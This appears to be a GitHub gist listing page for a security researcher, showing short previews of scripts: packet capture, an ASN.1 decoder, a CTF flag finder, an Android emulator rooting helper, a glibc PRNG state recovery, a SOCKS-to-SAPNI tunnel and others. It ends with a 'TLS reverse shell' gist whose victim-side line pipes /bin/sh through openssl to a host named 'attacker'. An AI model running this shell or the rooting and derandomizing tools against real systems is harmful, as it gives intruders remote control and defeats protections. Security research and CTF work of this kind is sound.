guillaume teissier gteissier
gteissier / root-my-emulator.py
Created June 3, 2020 13:23
gdb Python script that adds root-single command to elevate a process given by the name of its executable
import gdb
import re
from collections import namedtuple
DETAILS = {
# API 24 playstore
# API 25 playstore
'3.10.0+': (0xC0887D20, 0xC092138C, 316, 0xC0A7754C, 4),
# API 26 playstore
gteissier / socks2sapni.py
Created December 31, 2019 16:01
SOCKSv5 server to SAPNI tunneller: you can now use proxy chains to tunnel your favorite tools
#!/usr/bin/env python3
import logging
import select
import socket
import struct
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler
logging.basicConfig(level=logging.DEBUG)
SOCKS_VERSION = 5
gteissier / tcpdump.py
Created December 14, 2019 15:19
Pythonic tcpdump: copy, paste, and enjoy
#!/usr/bin/env python
'''
It has been tested with both py2 and py3.
Beware of ancient Linux kernel versions which may not support SOCK_NONBLOCK
or the memory-mapped ring buffer.
The BPF filter listed below is the compiled form of "not port 22";
if you want to change it, do something like
gteissier / compute-internal-state.py
Created September 4, 2019 11:50
glibc derandomization
#!/usr/bin/env python
import z3
import sys
# glibc default PRNG
# it is called TYPE_3, and is an additive recursive (lagged Fibonacci) generator
# its internal state is made of 31 32-bit integers
# r_0 ... r_30
# each call to random() will modify the internal state
gteissier / pygrep.py
Created May 10, 2019 09:29
Look for the FLAG[0-9a-zA-Z/+=]+ pattern everywhere, even in a jar contained in a zip contained in an ear
#!/usr/bin/env python
import os
import re
import zipfile
from cStringIO import StringIO
def process_file(f):
data = f.read()
for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data):
#!/usr/bin/env python
import requests
import sys
from base64 import b64encode
LHOST = '172.16.89.1'
LPORT = 8888
gteissier / asciinema_rebase.py
Created April 29, 2019 04:19
Asciinema now stores timestamps relative to the start of the capture. To skip the start of the capture, one needs to offset the timestamps from the first event kept in the capture.
#!/usr/bin/env python
import sys
import json
start_time = None
for line in sys.stdin.readlines():
o = json.loads(line)
if not isinstance(o, list):
gteissier / mass-webshot.py
Created April 26, 2019 07:28
Take web screenshots
#!/usr/bin/env python
from selenium import webdriver
import selenium
import sys
import re
def take_screenshot(url, png):
options = webdriver.ChromeOptions()
options.add_argument('headless')
gteissier / ber.py
Last active April 29, 2021 15:56
ASN.1 BER decoder
from cStringIO import StringIO
from struct import pack
from binascii import unhexlify, hexlify
from itertools import count, dropwhile
VERBOSE = True
class Asn1Obj:
'''generic frame for ASN.1 fields, supports nesting'''
def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None):
gteissier / cmd.sh
Last active April 9, 2024 09:46
TLS reverse shell
# attacker side: create a self-signed certificate and set up a listener
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
# victim side: connect back to attacker using TLS
mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect attacker:443 > fifo; rm fifo